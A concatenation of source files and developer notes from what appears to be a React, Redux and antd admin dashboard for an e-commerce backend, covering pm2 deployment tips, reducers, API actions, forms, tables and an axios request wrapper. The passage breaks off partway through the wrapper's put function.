> pm2是node进程管理工具,可以利用它来简化很多node应用管理的繁琐任务,如性能监控、自动重启、负载均衡等
1. 安装:`npm install -g pm2`利用npm安装pm2包
2. 启动:`pm2 start ./server/index.js --watch`watch参数是express代码发生变化时候,pm2会重启服务
3. 重启:`pm2 reset ./server/index.js`
4. 停止:`pm2 stop all | appid`停止全部或者某个应用
5. 删除:`pm2 delete all | appid`删除全部或某个应用
6. 查看全部应用 `pm2 list`
7. 查看某个进程信息 `pm2 show appid`
8. 环境配置:`--env production`
9. 配置文件:`pm2 init`
10. 日志信息:`pm2 logs`
export NODE_ENV=production && pm2 start ./server/index.js --watch
### nginx配置代理
<file_sep>import { GET_ORDER_LIST, GET_ORDER_BYID } from '../action/order';
const defaultState = {
orderList: {},
orderDetail: {},
}
export default (state = defaultState, action) => {
switch (action.type) {
case GET_ORDER_LIST:
return {
...state,
orderList: action.data
}
case GET_ORDER_BYID:
return {
...state,
orderDetail: action.data
}
default:
return state
}
}
<file_sep>import React from 'react';
import { Input, Form, DatePicker } from 'antd';
import { formItemLayout3 } from '../../utils/constant';
const FormItem = Form.Item;
class OrderForm extends React.PureComponent {
constructor(props) {
super(props);
if (props.getCurrent) {
props.getCurrent(this);
}
}
render() {
const { getFieldDecorator } = this.props.form;
return (
<Form>
<FormItem {...formItemLayout3} label="快递公司">
{getFieldDecorator('expressCompanyName', {
rules: [{
required: true, message: '请输入快递公司',
}],
})(
<Input placeholder="请输入快递公司" />
)}
</FormItem>
<FormItem {...formItemLayout3} label="快递单号">
{getFieldDecorator('expressTrackingNo', {
rules: [{
required: true, message: '请输入快递单号',
}],
})(
<Input placeholder="请输入快递单号" />
)}
</FormItem>
<FormItem {...formItemLayout3} label="发货时间">
{getFieldDecorator('shippingTime', {
rules: [{
required: true, message: '请选择发货时间',
}],
})(
<DatePicker format="YYYY-MM-DD HH:mm:ss" showTime placeholder="请选择发货时间" />
)}
</FormItem>
</Form>
)
}
}
export default Form.create()(OrderForm);
<file_sep>import { IS_DEFAULT, nullString } from '../../../utils/constant';
const columns = [
{
title: '姓名',
dataIndex: 'consigneeName',
key: 'consigneeName',
align: 'center',
},
{
title: '手机号码',
dataIndex: 'phoneNumber',
key: 'phoneNumber',
align: 'center',
},
{
title: '详细地址',
dataIndex: 'address',
key: 'address',
align: 'center',
render: (text, record) => record.cityName
?`${record.cityName}${record.districtName}${record.fullAddress}`
: nullString
},
{
title: '邮政编码',
dataIndex: 'zipCode',
key: 'zipCode',
align: 'center',
render: (text) => text || nullString
},
{
title: '默认地址',
dataIndex: 'isDefult',
key: 'isDefult',
align: 'center',
render: (text) => IS_DEFAULT[text]
},
];
export default columns;
<file_sep>const columns = [
{
title: '用户账号',
dataIndex: 'account',
key: 'account',
align: 'center',
},
{
title: '登录时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
},
{
title: '登录方式',
dataIndex: 'registChannel',
key: 'registChannel',
align: 'center',
},
{
title: 'IP',
dataIndex: 'remoteAddr',
key: 'remoteAddr',
align: 'center',
},
{
title: '地区',
dataIndex: 'location',
key: 'location',
align: 'center',
},
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
},
];
export default columns;
<file_sep>import { AUTH_USER_LOGIN, AUTH_USER_EXPIRE, GET_USER_INFO } from '../action/auth';
const defaultState = {
authStatus: false,
userInfo: {},
}
export default (state = defaultState, action) => {
switch (action.type) {
case AUTH_USER_LOGIN:
return {
...state,
authStatus: true,
}
case AUTH_USER_EXPIRE:
return {
...state,
authStatus: false,
}
case GET_USER_INFO:
return {
...state,
userInfo: action.data,
}
default:
return state
}
}
<file_sep>export const nullString = '--';
export const formItemLayout = {
labelCol: {
xs: { span: 24 },
sm: { span: 8 }
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 16 }
}
};
export const formItemLayout2 = {
labelCol: {
xs: { span: 24 },
sm: { span: 4 },
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 8 },
},
};
export const formItemLayout3 = {
labelCol: {
xs: { span: 24 },
sm: { span: 6 },
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 18 },
},
};
export const formItemLayout4 = {
labelCol: {
xs: { span: 24 },
sm: { span: 4 },
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 14 },
},
};
export const formItemLayout5 = {
labelCol: {
xs: { span: 24 },
sm: { span: 6 },
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 14 },
},
};
export function showTotal(total, range) {
return `共${total}条数据`;
}
export const PRODUCT_TYPE = {
1: '大类一',
2: '大类二',
3: '大类三',
}
export const PRODUCT_SUB = {
1: '子类一',
2: '子类二',
3: '子类三',
}
export const PRODUCT_STATUS = {
0: '待上架',
1: '上架',
2: '下架',
}
export const PRODUCT_PRICE_STATUS = {
0: '未定价',
1: '已定价',
}
export const SUPPLY_STATUS = {
0: '无货',
1: '现货',
2: '定做',
}
export const UNIT_VALUES = {
0: '米',
1: '千克',
}
export const USER_ACCOUNT_STATUS = {
0: '正常',
1: '封号',
}
export const REGIST_CHANNEL = {
0: '公众号',
1: '小程序',
2: 'APP',
3: '网站',
}
export const PAYMENT_METHOD = {
0: '在线支付',
1: '货到付款',
2: '公司转账',
}
export const ORDER_STATUS = {
0: '待支付',
1: '待发货',
2: '已发货',
3: '已完成',
4: '已取消',
}
export const ORDER_OPERATE = {
0: '取消订单',
1: '订单发货',
2: '确认收货',
}
export const IS_DEFAULT = {
0: '否',
1: '是',
}
export const AGENT_TYPE = {
0: '门店代理商',
1: '个人代理商',
}
export const SKY_TYPE = {
1: 'Banner',
}
export const ORDER_TYPE = {
'Normal': '正常',
}
export const PAYMENT_CHANNEL = {
0: '微信Wechat',
1: '支付宝Alipay',
2: '银联'
}
export const AGENT_STATUS = {
0: '正常',
1: '暂停',
}
<file_sep>import React from 'react';
import { Card, Form, Input, Select, Button } from 'antd';
import EnhanceTitle from '../../component/EnhanceTitle';
const FormItem = Form.Item;
const { Option } = Select;
const { TextArea } = Input;
const formItemLayout = {
labelCol: {
xs: { span: 24 },
sm: { span: 4 },
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 8 },
},
};
@Form.create()
export default class SkylightAdd extends React.PureComponent {
render() {
const { getFieldDecorator } = this.props.form;
return (
<div className="page-detail">
<Form onSubmit={this.handleSubmit}>
<Card bordered={false}>
<EnhanceTitle title="基本信息" />
<FormItem {...formItemLayout} label="代理商编号">
{getFieldDecorator('id', {
rules: [{
required: true, message: '请输入代理商编号',
}],
})(
<Input placeholder="请输入代理商编号" />
)}
</FormItem>
<FormItem {...formItemLayout} label="代理商类型">
{getFieldDecorator('type', {
rules: [{
required: true, message: '请选择代理商类型',
}],
})(
<Select allowClear placeholder="请选择代理商类型">
<Option value="Banner">Banner</Option>
</Select>
)}
</FormItem>
<FormItem {...formItemLayout} label="代理商名称">
{getFieldDecorator('name', {
rules: [{
required: true, message: '请输入代理商名称',
}],
})(
<Input placeholder="请输入代理商名称" />
)}
</FormItem>
<FormItem {...formItemLayout} label="代理商账号">
{getFieldDecorator('accountId', {
rules: [{
required: true, message: '请输入代理商账号',
}],
})(
<Input rows={4} placeholder="请输入代理商账号" />
)}
</FormItem>
<FormItem {...formItemLayout} label="返点率">
{getFieldDecorator('diPer', {
rules: [{
required: true, message: '请输入返点率',
}],
})(
<Input rows={4} placeholder="请输入返点率" />
)}
</FormItem>
<FormItem {...formItemLayout} label="代理商状态">
{getFieldDecorator('status', {
rules: [{
required: true, message: '请输入代理商状态',
}],
})(
<Input rows={4} placeholder="请输入代理商状态" />
)}
</FormItem>
<FormItem {...formItemLayout} label="门店图片">
{getFieldDecorator('url', {
rules: [{
required: true, message: '请输入门店图片',
}],
})(
<Input rows={4} placeholder="请输入门店图片" />
)}
</FormItem>
<FormItem {...formItemLayout} label="门店详情">
{getFieldDecorator('detail', {
rules: [{
required: true, message: '请输入门店详情',
}],
})(
<TextArea rows={4} placeholder="请输入门店详情" />
)}
</FormItem>
<FormItem {...formItemLayout} label="创建时间">
{getFieldDecorator('createTime', {
rules: [{
required: true, message: '请输入创建时间',
}],
})(
<Input rows={4} placeholder="请输入创建时间" />
)}
</FormItem>
<FormItem {...formItemLayout} label="创建人">
{getFieldDecorator('creator', {
rules: [{
required: true, message: '请输入创建人',
}],
})(
<Input rows={4} placeholder="请输入创建人" />
)}
</FormItem>
<FormItem {...formItemLayout} label="更新时间">
{getFieldDecorator('updateTime', {
rules: [{
required: true, message: '请输入更新时间',
}],
})(
<Input rows={4} placeholder="请输入更新时间" />
)}
</FormItem>
<FormItem {...formItemLayout} label="更新人">
{getFieldDecorator('editer', {
rules: [{
required: true, message: '请输入更新人',
}],
})(
<Input rows={4} placeholder="请输入更新人" />
)}
</FormItem>
</Card>
<div>
<Button style={{ width: '120px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
<Button style={{ width: '120px' }}>清空</Button>
</div>
</Form>
</div>
)
}
}
<file_sep>import API from '../utils/api';
import { get, post, put } from '../utils/request';
export const GET_SYSTEM_LOG_LIST = 'GET_SYSTEM_LOG_LIST';
export const GET_SYSTEM_DICT_LIST = 'GET_SYSTEM_DICT_LIST';
export function getSystemLogList(params) {
return async (dispatch) => {
const result = await get(API.getSystemLogList, params);
if (result && result.status === 200) {
dispatch({
type: GET_SYSTEM_LOG_LIST,
data: result.data
});
}
}
}
export function getSystemDictList(params) {
return async (dispatch) => {
const result = await get(API.getSystemDictList, params);
if (result && result.status === 200) {
dispatch({
type: GET_SYSTEM_DICT_LIST,
data: result.data
});
} else {
dispatch({
type: GET_SYSTEM_DICT_LIST,
data: {}
});
}
}
}
export async function postSystemDict(params) {
const result = await post(API.postSystemDict, params);
if (result && result.status === 200) {
return result.data;
}
}
export async function putSystemDict(params) {
const result = await put(API.putSystemDict, params);
if (result && result.status === 200) {
return result.data;
}
}
export async function getSystemDictById(id) {
const result = await get(`${API.getSystemDictById.replace(/{id}/, id)}`);
if (result && result.status === 200) {
return result.data
}
}
export async function getSystemDictByLabel(label) {
const result = await get(`${API.getSystemDictByLabel.replace(/{label}/, label)}`);
if (result && result.status === 200) {
return result.data
}
}
export async function getSystemDicts(params) {
const result = await get(API.getSystemDicts, params);
if (result && result.status === 200) {
return result.data
}
}
<file_sep>## creat-react-server
- [x] creat-react-app
- [x] react-hot-loader
- [x] redux
- [x] redux-thunk
- [x] antd-mobile
- [ ] 服务端渲染
- [x] 接口转发处理
- [ ] jwt使用
- [x] axios
- [x] antd
- [ ] eslint怎么做的
## ANTD真的好大
1. 按需加载之后一个Button组件引入就有500kb
2. 在Main.jsx文件中,竟然从600kb增加到了1300kb
3. 如果只引入login.jsx文件,只有720kb,感觉一个组件要增加100kb左右
4. 必须在nginx服务下开启gzip压缩机制,不然真的很卡
## AuthRoute组件判断是否登录
1. 因为子组件在父组件之前执行,因此引入了`AuthRoute`组件先判断是否登录再加载children组件
## Authorization和后台对接方式
1. auth权限接口设计,每一次接口请求都要在header里添加`Authorization`属性来判断是否有权限,感觉像以前的cookie或者jwt方式登录
2. 如果后台判断没有权限,就会返回401状态,理想中想直接在request中直接push跳转到login页面,但是react-router库在4.0移出了直接使用push方法
3. 目前每次在action中判断是否401,如果是就设置store的isAuth值来跳转路由
## 遇到问题
1. nginx怎么部署
2. 怎么开始gzip服务
## 父组件改变引起子组件改变
1. 父组件发生state或者props改变时,使用继承Component组件,会引起子组件render改变
2. 如果使用继承PureComponent组件,就拥有浅比较,不会引起多余的子组件渲染
### PureComponent浅比较是什么
### localStorage和localStorage
localStorage在同一个域名不同标签下是可以共享的,但是不同域名是不可以共享的
localStorage在不同标签下是不可以共享的,因此要解决localStorage共享问题
https://blog.kazaff.me/2016/09/09/%E8%AF%91-%E5%9C%A8%E5%A4%9A%E4%B8%AA%E6%A0%87%E7%AD%BE%E9%A1%B5%E4%B9%8B%E9%97%B4%E5%85%B1%E4%BA%ABlocalStorage/
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button } from 'antd';
import logsColumns from './columns/logs';
import { formItemLayout, showTotal } from '../../utils/constant';
import { getUserLoginList } from '../../action/user';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ user }) => ({
userLoginLogs: user.userLoginLogs
}), {
getUserLoginList
})
@Form.create()
export default class UserLogsList extends React.PureComponent {
state = {
pagination: {
showSizeChanger: true,
showQuickJumper: true,
},
loading: false,
};
componentDidMount() {
this.getUserLoginList();
}
getUserLoginList = async (params) => {
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { createTime, ...newParams } = values;
const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
await this.props.getUserLoginList({ ...newParams, ...params, beginTime, endTime});
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
handleSubmit = (e) => {
e.preventDefault();
this.getUserLoginList();
}
onSelectChange = (selectedRowKeys) => {
this.setState({ selectedRowKeys });
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getUserLoginList({
page: pagination.current,
limit: pagination.pageSize,
});
}
handleReset = () => {
this.props.form.resetFields();
};
render() {
const { form: { getFieldDecorator }, userLoginLogs: { records = [], total } } = this.props;
const { pagination, loading } = this.state;
return (
<div className="page-list product-list">
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="用户账号">
{getFieldDecorator('account')(
<Input placeholder="请输入用户账号" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="登录方式">
{getFieldDecorator('registChannel')(
<Select allowClear placeholder="请选择登录方式">
<Option value="0">公众号</Option>
<Option value="1">小程序</Option>
<Option value="2">APP</Option>
<Option value="3">网站</Option>
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="登录起止时间">
{getFieldDecorator('loginTime')(
<RangePicker format={dateFormat} />
)}
</FormItem>
</Col>
</Row>
<Row>
<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button
style={{ marginLeft: '8px', marginRight: '8px' }}
onClick={this.handleReset}
>
清空
</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
rowKey="id"
columns={logsColumns}
dataSource={records}
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: total, ...pagination }}
loading={loading}
/>
</Card>
</div>
)
}
}
<file_sep>import API from '../utils/api';
import { get, post, put } from '../utils/request';
export const GET_PRODUCT_TYPE_LIST = 'GET_PRODUCT_TYPE_LIST';
export function getProductTypeList(params) {
return async (dispatch) => {
const result = await get(API.getProductTypeList, params);
if (result && result.status === 200) {
dispatch({
type: GET_PRODUCT_TYPE_LIST,
data: result.data
});
} else {
dispatch({
type: GET_PRODUCT_TYPE_LIST,
data: {}
});
}
}
}
export async function postProductType(params) {
const result = await post(API.postProductType, params);
if (result && result.status === 200) {
return result.data;
}
}
export async function putProductType(params) {
const result = await put(API.putProductType, params);
if (result && result.status === 200) {
return result.data;
}
}
export async function getProductTypeById(id) {
const result = await get(`${API.getProductTypeById.replace(/{id}/, id)}`);
if (result && result.status === 200) {
return result.data.data
}
}
export async function getSystemDictByLabel(label) {
const result = await get(`${API.getSystemDictByLabel.replace(/{label}/, label)}`);
if (result && result.status === 200) {
return result.data
}
}
export async function getProductTypes(params) {
const result = await get(API.getProductTypes, params);
if (result && result.status === 200) {
return result.data
}
}
<file_sep>import React from 'react';
import { Drawer, Form, Button, Input, message } from 'antd';
import { formItemLayout5 } from '../../utils/constant';
import Uploader from '../../component/Uploader';
const FormItem = Form.Item;
const { TextArea } = Input;
@Form.create()
export default class AddItem extends React.Component {
state = {
loading: false,
};
handleSubmit = () => {
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { image, ...params } = values;
const imageUrl = image[0];
const { level, title } = this.props;
this.setState({ loading: true });
const result = await this.props.handleSubmit({ ...params, level, image: imageUrl });
this.setState({ loading: false });
if (result.code === 0) {
this.onClose();
message.success(`${title}成功`);
}
}
});
}
onClose = () => {
this.props.onClose();
this.props.form.resetFields();
}
render() {
const { getFieldDecorator } = this.props.form;
const { detail = {}, actionType, title } = this.props;
return (
<Drawer
title={title}
width={600}
placement="right"
onClose={this.onClose}
visible={this.props.visible}
>
<Form>
<FormItem {...formItemLayout5} label="父编码">
{getFieldDecorator('parentLabel', {
initialValue: this.props.parentLabel,
rules: [{
required: true, message: '请输入字典父编码',
}],
})(
<Input disabled placeholder="请输入字典父编码" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="值">
{getFieldDecorator('value', {
initialValue: detail.value,
rules: [{
required: true, message: '请输入字典值',
}],
})(
<Input placeholder="请输入字典值" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="字典编码">
{getFieldDecorator('label', {
initialValue: detail.label,
rules: [{
required: true, message: '请输入字典编码',
}],
})(
<Input placeholder="请输入字典编码" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="字典名称">
{getFieldDecorator('description', {
initialValue: detail.description,
rules: [{
required: true, message: '请输入字典名称',
}],
})(
<Input placeholder="请输入字典名称" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="顺序">
{getFieldDecorator('sort', {
initialValue: detail.sort,
rules: [{
required: true, message: '请输入字典顺序',
}],
})(
<Input placeholder="请输入字典顺序" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="分类图片">
{getFieldDecorator('image', {
initialValue: detail.image ? [detail.image] : [],
rules: [{
required: true, message: '请添加分类图片',
}],
})(
<Uploader type="product_type" max={1} />
)}
</FormItem>
<FormItem {...formItemLayout5} label="备注">
{getFieldDecorator('remarks', {
initialValue: detail.remarks,
})(
<TextArea rows={4} placeholder="请输入字典备注" />
)}
</FormItem>
<FormItem {...formItemLayout5} label=" " colon={false}>
{actionType !== 'show' && <Button style={{ marginRight: 8 }} onClick={this.handleSubmit} type="primary">提交</Button>}
<Button onClick={this.onClose}>取消</Button>
</FormItem>
</Form>
</Drawer>
);
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Link } from 'react-router-dom';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button, Divider, message, Popconfirm } from 'antd';
import listColumns from './columns/list';
import { formItemLayout, showTotal, SKY_TYPE } from '../../utils/constant';
import { getSkylightList, deleteSkylight } from '../../action/skylight';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ skylight }) => ({
skylightList: skylight.skylightList
}), {
getSkylightList
})
@Form.create()
export default class SkylightList extends React.PureComponent {
constructor(props) {
super(props);
this.columns = [
...listColumns,
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
render: (text, record) => (
<div>
<Link to={`/skylight/detail/${record.id}`}>查看</Link>
<Divider type="vertical" />
<Link to={`/skylight/edit/${record.id}`}>编辑</Link>
<Divider type="vertical" />
<Popconfirm
placement="topLeft"
title={`请确定是否删除此天窗?`}
onConfirm={() => this.deleteSkylight(record.id)}
okText="确定"
cancelText="取消"
>
<a href="javascript:;">删除</a>
</Popconfirm>
</div>
)
},
];
}
state = {
selectedRowKeys: [],
pagination: {
showSizeChanger: true,
showQuickJumper: true,
},
loading: false,
};
componentDidMount() {
this.getSkylightList();
}
onSelectChange = (selectedRowKeys) => {
this.setState({ selectedRowKeys });
}
getSkylightList = (params) => {
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { createTime, ...newParams } = values;
const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
await this.props.getSkylightList({ ...newParams, ...params, beginTime, endTime});
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
deleteSkylight = async (id) => {
const result = await deleteSkylight(id);
if (result && result.code === 0) {
message.success(`删除ID为${id}的天窗成功`);
const pager = { ...this.state.pagination };
this.getSkylightList({
limit: pager.pageSize,
page: pager.current,
});
} else {
message.error('删除天窗失败,请稍后重试');
}
}
handleSubmit = (e) => {
e.preventDefault();
this.getSkylightList();
}
handleReset = () => {
this.props.form.resetFields();
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getSkylightList({
limit: pagination.pageSize,
page: pagination.current,
});
}
render() {
const { form: { getFieldDecorator }, skylightList } = this.props;
const { selectedRowKeys, loading } = this.state;
const rowSelection = {
selectedRowKeys,
onChange: this.onSelectChange,
}
return (
<div className="page-list product-list">
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="天窗标题">
{getFieldDecorator('skyTitle')(
<Input placeholder="请输入天窗标题" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="天窗类型">
{getFieldDecorator('skyType')(
<Select allowClear placeholder="请选择天窗类型">
{Object.keys(SKY_TYPE).map(item => (
<Option key={item} value={item}>{SKY_TYPE[item]}</Option>
))}
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="创建起止时间">
{getFieldDecorator('createTime')(
<RangePicker format={dateFormat} />
)}
</FormItem>
</Col>
</Row>
<Row>
<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button
style={{ marginLeft: '8px', marginRight: '8px' }}
onClick={this.handleReset}
>
清空
</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
rowKey="id"
rowSelection={rowSelection}
columns={this.columns}
dataSource={skylightList.records}
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: skylightList.total, ...this.state.pagination }}
loading={loading}
/>
</Card>
</div>
)
}
}
<file_sep>import API from '../utils/api';
import { get, post, put } from '../utils/request';
export const GET_PRODUCT_LIST = 'GET_PRODUCT_LIST';
export const GET_PRODUCT_BYID = 'GET_PRODUCT_BYID';
export function getProductList(params) {
return async (dispatch) => {
const result = await get(API.productList, params);
if (result && result.status === 200) {
dispatch({
type: GET_PRODUCT_LIST,
data: result.data
});
return result.data;
}
}
}
export function getProductById(id) {
return async (dispatch) => {
const result = await get(`${API.getProductById}/${id}`);
if (result && result.status === 200) {
dispatch({
type: GET_PRODUCT_BYID,
data: result.data.data
});
return result.data.data;
}
}
}
export async function addProduct(params) {
const result = await post(API.addProduct, params);
if (result && result.status === 200) {
return result.data
}
}
export async function updateProduct(params) {
const result = await put(API.updateProduct, params);
if (result && result.status === 200) {
return result.data
}
}
export async function batchUpProduct(params) {
const result = await post(API.batchUpProduct, params);
if (result && result.status === 200) {
return result.data
}
}
export async function batchDownProduct(params) {
const result = await post(API.batchDownProduct, params);
if (result && result.status === 200) {
return result.data
}
}
export async function addBatch(params) {
const result = await post(API.addBatch, params);
if (result && result.status === 200) {
return result.data
}
}
export async function getProductCode(id, sn) {
const result = await get(`${API.getProductCode.replace(/{id}\/{sn}/, `${id}/${sn}`)}`);
if (result && result.status === 200) {
return result.data
}
}
<file_sep>## 父组件改变引起子组件改变
在组件中,如果props和state改变,会引起当前组件的render的重新渲染,那么父组件的子组件会产生什么变化呢
### 父组件的state和props改变引起普通子组件改变
> 子组件是继承Component类形成的
 如果子组件是继承类Component的一定会随着父组件的render改变发生重新render的
```
export default class Test extends React.PureComponent {
state = {
value: ''
}
handleChange = (e) => {
this.setState({ value: e.target.value })
}
render() {
console.log(this.state.value);
return (
<div>
<input onChange={this.handleChange} />
<Item />
</div>
)
}
}
class Item extends React.Component {
render() {
console.log('child render')
return (
<div>item</div>
)
}
}
```
### 父组件的state和props改变引起纯子组件改变
> 子组件是继承PureComponent类或纯函数形成的
 1. 如果子组件和父组件不存在数据传递关系,或传递的数据没有发生改变,那么父组件的render渲染不会对子组件造成影响
 2. 如果子组件的数据由父组件传递,且传递的数据在父组件发生改变,那么子组件render一定随着父组件重新渲染
```
export default class Test extends React.PureComponent {
state = {
value: '',
test: 'test'
}
handleChange = (e) => {
this.setState({ value: e.target.value })
}
render() {
console.log(this.state.value);
return (
<div>
<input onChange={this.handleChange} />
<Item value={this.state.value} />
</div>
)
}
}
class Item extends React.PureComponent {
componentDidMount() {
console.log('child mount did')
}
render() {
console.log('child render')
return (
<div>{this.props.value}</div>
)
}
}
```
### 组件和react-router一起使用
 1. 父组件没有向路由组件传递数据时,路由数据不会重新渲染
 2. 父组件向路由组件传递数据时,路由组件可能会引起一些问题
如果只传入一个组件时,可以使用Router的component属性,但是你要通过props传递数据给路由子组件时,就不能用component属性了,因为你构建一个新的组件,这就导致组件变成卸载和安装而不是更新了
eg:
```<Route component={() => <Item value={this.state.value} />} path={`/test/list/props-v-state`} />```
官方推荐时候render或children属性进行组件传递,就不会造成上面问题,也就是遇见很奇怪的路由组件会产生多次componentDidMount
```<Route render={() => <Item value={this.state.value} />} path={`/test/list/props-v-state`} />```
<file_sep>import React, { Fragment } from 'react';
import { connect } from 'react-redux';
import { Route, Redirect } from 'react-router-dom';
import { Spin } from 'antd';
import { authCheck } from '../../action/auth';
@connect(({ auth }) => ({
authStatus: auth.authStatus
}), {
authCheck
})
export default class AuthRoute extends React.PureComponent {
state = {
hasAuth: false,
auth: false,
}
async componentDidMount() {
await this.props.authCheck();
const { authStatus } = this.props;
if (authStatus) {
this.setState({ hasAuth: true, auth: true });
} else {
this.setState({ hasAuth: true, auth: false });
}
}
render() {
const { Layout, ...rest } = this.props;
return this.state.hasAuth ? (
<Fragment>
{
this.state.auth ? (
<Route {...rest} render={(props) => <Layout {...props} />}/>
) : (
<Redirect to={{ pathname: '/login',state: { from: rest.location } }}
/>
)
}
</Fragment>
) : (
<div style={{ width: '100%', height: '100%',margin: 'auto', paddingTop: 50, textAlign: 'center' }}>
<Spin />
</div>
)
}
}
<file_sep>import { formatDateSecond } from '../../../utils/utils';
import { nullString, AGENT_TYPE, AGENT_STATUS } from '../../../utils/constant';
const columns = [
{
title: '代理商编号',
dataIndex: 'sn',
key: 'sn',
align: 'center',
},
{
title: '代理商名称',
dataIndex: 'name',
key: 'name',
align: 'center',
},
{
title: '代理商类型',
dataIndex: 'type',
key: 'type',
align: 'center',
render: (text) => AGENT_TYPE[text] || nullString
},
{
title: '返点率',
dataIndex: 'diPer',
key: 'diPer',
align: 'center',
},
{
title: '代理商状态',
dataIndex: 'status',
key: 'status',
align: 'center',
render: (text) => AGENT_STATUS[text] || nullString
},
{
title: '创建时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
render: (text) => text ? formatDateSecond(text) : nullString
},
];
export default columns;
<file_sep>import axios from 'axios';
import { message } from 'antd';
import qs from 'qs';
import { store } from '../index';
import { authUserExpire } from '../action/auth';
/**
* 封装get方法
* @param url
* @param data
* @returns {Promise}
*/
export async function get(url, params = {}) {
try {
const result = await axios({
method: 'GET',
headers: { 'Authorization': localStorage.getItem('Authorization') || 'Basic cGlnOnBpZw==' },
params,
url
});
return result;
} catch (error) {
if (error.response) {
if (error.response.status === 401) {
message.error('登录有效期失效,请重新登录');
store.dispatch(authUserExpire());
} else {
message.error(error.response.statusText);
}
} else {
message.error('Error', error);
}
}
}
/**
* 封装post请求
* @param url
* @param data
* @returns {Promise}
*/
export async function post(url, data = {}) {
try {
const result = await axios({
method: 'POST',
headers: { 'Authorization': localStorage.getItem('Authorization'), 'Content-Type': 'application/json;charset=UTF-8' },
data: data,
url
});
return result;
} catch (error) {
if (error.response) {
if (error.response.status === 401) {
message.error('登录有效期失效,请重新登录');
store.dispatch(authUserExpire());
}
} else {
message.error('Error', error);
}
}
}
export async function requestLogin(url, data = {}) {
try {
const result = await axios({
method: 'POST',
headers: { 'Authorization': 'Basic cGlnOnBpZw==' },
data: qs.stringify(data),
url
});
if (result.data) {
localStorage.setItem('Authorization', `${result.data.token_type} ${result.data.access_token}`);
}
return result;
} catch (error) {
if (error.response) {
if (error.response.status === 401) {
message.error('登录有效期失效,请重新登录');
store.dispatch(authUserExpire());
} else {
message.error(error.response.data.error_description);
}
} else {
message.error('Error', error);
}
}
}
/**
* 封装deltet请求
* @param url
* @param data
* @returns {Promise}
*/
export async function deleted(url, data = {}) {
try {
const result = await axios({
method: 'DELETE',
headers: { 'Authorization': localStorage.getItem('Authorization'), 'Content-Type': 'application/json;charset=UTF-8' },
data: data,
url
});
return result;
} catch (error) {
if (error.response) {
if (error.response.status === 401) {
message.error('登录有效期失效,请重新登录');
store.dispatch(authUserExpire());
}
} else {
message.error('Error', error);
}
}
}
/**
* 封装put请求
* @param url
* @param data
* @returns {Promise}
*/
export async function put(url, data = {}) {
try {
const result = await axios({
method: 'PUT',
headers: { 'Authorization': localStorage.getItem('Authorization'), 'Content-Type': 'application/json;charset=UTF-8' },
data: data,
url
});
return result;
} catch (error) {
if (error.response) {
if (error.response.status === 401) {
